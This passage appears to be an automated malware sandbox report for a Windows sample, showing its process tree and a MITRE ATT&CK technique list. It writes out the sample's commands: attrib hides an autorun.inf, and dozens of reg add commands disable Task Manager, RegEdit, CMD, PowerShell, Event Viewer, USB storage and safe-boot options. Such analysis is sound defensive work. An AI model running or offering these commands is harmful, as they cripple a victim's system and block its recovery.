  - Drops autorun.inf file
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:332
- C:\Windows\system32\attrib.exe
  attrib +r +s +h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"
  2⤵
  - Sets file to hidden
  - Drops autorun.inf file
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:6052
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:4224
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v DisablePowerShell /t REG_DWORD /d 1 /f
  2⤵
  PID:5572
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\MMC" /v RestrictToPermittedSnapins /t REG_DWORD /d 1 /f
  2⤵
  PID:5600
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  PID:5628
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePaint /t REG_DWORD /d 1 /f
  2⤵
  PID:5632
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  PID:5656
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableStickyKeys /t REG_DWORD /d 1 /f
  2⤵
  PID:5668
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:5500
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePerformanceMonitor /t REG_DWORD /d 1 /f
  2⤵
  PID:436
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:520
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMMC /t REG_DWORD /d 1 /f
  2⤵
  PID:4360
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEventViewer /t REG_DWORD /d 1 /f
  2⤵
  PID:6024
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoWinKeys /t REG_DWORD /d 1 /f
  2⤵
  PID:1460
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableCMD /t REG_DWORD /d 1 /f
  2⤵
  PID:5984
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableSnippingTool /t REG_DWORD /d 1 /f
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3700
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:5292
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMagnifier /t REG_DWORD /d 1 /f
  2⤵
  PID:5940
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEaseOfAccess /t REG_DWORD /d 1 /f
  2⤵
  PID:4060
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "perfmon.msc" /d "" /f
  2⤵
  PID:5260
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "perfmon.exe" /d "" /f
  2⤵
  PID:5332
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mmc.exe" /d "" /f
  2⤵
  PID:2456
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mstsc.exe" /d "" /f
  2⤵
  PID:3488
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mobsync.exe" /d "" /f
  2⤵
  PID:5192
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "SoundRecorder.exe" /d "" /f
  2⤵
  PID:5380
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "displayswitch.exe" /d "" /f
  2⤵
  PID:3792
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "conhost.exe" /d "" /f
  2⤵
  PID:3272
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "taskkill.exe" /d "" /f
  2⤵
  PID:3680
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "tasklist.exe" /d "" /f
  2⤵
  PID:5920
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "iexpress.exe" /d "" /f
  2⤵
  PID:5804
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d "1" /f
  2⤵
  PID:5688
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
  2⤵
  PID:5684
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /v "OptionValue" /t REG_DWORD /d "4" /f
  2⤵
  PID:5176
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /v "OptionValue" /t REG_DWORD /d "4" /f
  2⤵
  PID:6088
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRunAs" /t REG_DWORD /d "1" /f
  2⤵
  - Access Token Manipulation: Create Process with Token
  PID:5712
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:6044
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:1040
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMSCONFIG /t REG_DWORD /d 1 /f
  2⤵
  PID:5136
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "1" /f
  2⤵
  PID:5968
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2748

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2456

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:1952

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3644

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3712

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1864

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x488 0x3c8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1460

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3792

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5856

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:5788

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:5392

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5976

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6056

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:3836

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5440

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3760

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:4204

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5580

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3272

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5780

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 5580 -ip 5580
1⤵
PID:5628

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:1720

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6516

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 1720 -ip 1720
1⤵
PID:3272

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:5320

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5580

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5596

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2180

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5860

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6308

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery